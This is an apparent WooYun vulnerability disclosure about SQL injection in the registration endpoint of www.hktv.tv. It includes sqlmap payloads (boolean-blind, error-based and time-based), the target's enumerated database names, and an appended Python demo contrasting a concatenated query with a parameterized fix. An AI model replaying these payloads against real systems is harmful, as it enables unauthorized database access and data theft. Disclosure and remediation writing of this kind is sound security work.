WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
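2015-05-18: Details reported to the vendor; awaiting vendor action
2015-05-18: Vendor confirmed; details disclosed to the vendor only
2015-05-28: Details disclosed to core white hats and experts in related fields
2015-06-07: Details disclosed to regular white hats
2015-06-17: Details disclosed to intern white hats
2015-07-02: Details disclosed to the public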
光息谷, an app owned by 云视, has a POST injection in its registration function.
As before, capture the registration request:
POST /e/extend/new_client_api/register.php HTTP/1.1
Host: www.hktv.tv
Proxy-Connection: keep-alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 35
Connection: keep-alive
User-Agent: 光息谷 2.9 (iPhone; iPhone OS 8.3; zh_CN)

loginname=11111ddd&password=fffgggg
Proof:
sqlmap identified the following injection points with a total of 58 HTTP(s) requests:
---
Place: POST
Parameter: loginname
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: loginname=11111ddd' AND 3771=3771 AND 'bSDS'='bSDS&password=fffgggg

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: loginname=11111ddd' AND (SELECT 6551 FROM(SELECT COUNT(*),CONCAT(0x3a6572693a,(SELECT (CASE WHEN (6551=6551) THEN 1 ELSE 0 END)),0x3a6a64613a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'fSpK'='fSpK&password=fffgggg

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: loginname=11111ddd' AND SLEEP(5) AND 'eTPF'='eTPF&password=fffgggg
---
[16:43:08] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.23
back-end DBMS: MySQL 5.0
[16:43:08] [INFO] fetched data logged to text files under 'D:\Python27\sqlmap\output\www.hktv.tv'

[*] shutting down at 16:43:08
Database list:
available databases [24]:
[*] bbs_hktv
[*] cdp
[*] cms_as
[*] cms_hktv
[*] information_schema
[*] jsbc-security
[*] meicam
[*] mysql
[*] odp
[*] onairfastedit
[*] onairtranscode
[*] ors
[*] performance_schema
[*] security_as
[*] security_hktv
[*] security_hn
[*] vms
[*] vms_as
[*] vms_hktv
[*] vms_jyg
[*] vms_sjs
[*] wechat_hn
[*] wechat_sjs
[*] yicloud_aliyun_rds_dummy_database
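As in the title.
Severity: High
Vulnerability Rank: 20
Confirmation time: 2015-05-18 17:10
Thank you for your attention; we will fix this as soon as possible.
None yet.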
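The boolean-based finding on `loginname` in the sqlmap output above means the registration handler answers differently depending on a condition embedded in that field. The following is an added example, not code from the report or from the vendor, showing that behaviour next to a parameterized query that removes it. Assumptions: an in-memory SQLite database stands in for MySQL, and the `members` table, both handler functions and the false-condition string are hypothetical.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the member table (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (loginname TEXT PRIMARY KEY, password TEXT)")
    db.execute("INSERT INTO members VALUES ('11111ddd', 'x')")
    return db

def name_taken_vulnerable(db, loginname):
    # Hypothetical reconstruction of the flaw: the POST value is pasted into
    # the SQL text, so a quote in loginname closes the string literal and the
    # remainder of the field is parsed as SQL.
    sql = "SELECT COUNT(*) FROM members WHERE loginname = '%s'" % loginname
    return db.execute(sql).fetchone()[0] > 0

def name_taken_safe(db, loginname):
    # Bound parameter: the value is sent as data and never becomes SQL text.
    sql = "SELECT COUNT(*) FROM members WHERE loginname = ?"
    return db.execute(sql, (loginname,)).fetchone()[0] > 0

# loginname value from the boolean-based payload in the sqlmap output above,
# and a constructed variant whose embedded condition is false.
TRUE_COND = "11111ddd' AND 3771=3771 AND 'bSDS'='bSDS"
FALSE_COND = "11111ddd' AND 3771=3772 AND 'bSDS'='bSDS"

def leaks_boolean_oracle(check, db):
    """True if the handler answers differently for the true and false
    conditions, which is the signal boolean-based blind detection relies on."""
    return check(db, TRUE_COND) != check(db, FALSE_COND)

if __name__ == "__main__":
    db = make_db()
    for name, check in (("concatenated", name_taken_vulnerable),
                        ("parameterized", name_taken_safe)):
        print(name, "query leaks oracle:", leaks_boolean_oracle(check, db))
```

With the bound parameter the whole field is compared as one literal string, so both test values simply fail to match any account and the responses are identical.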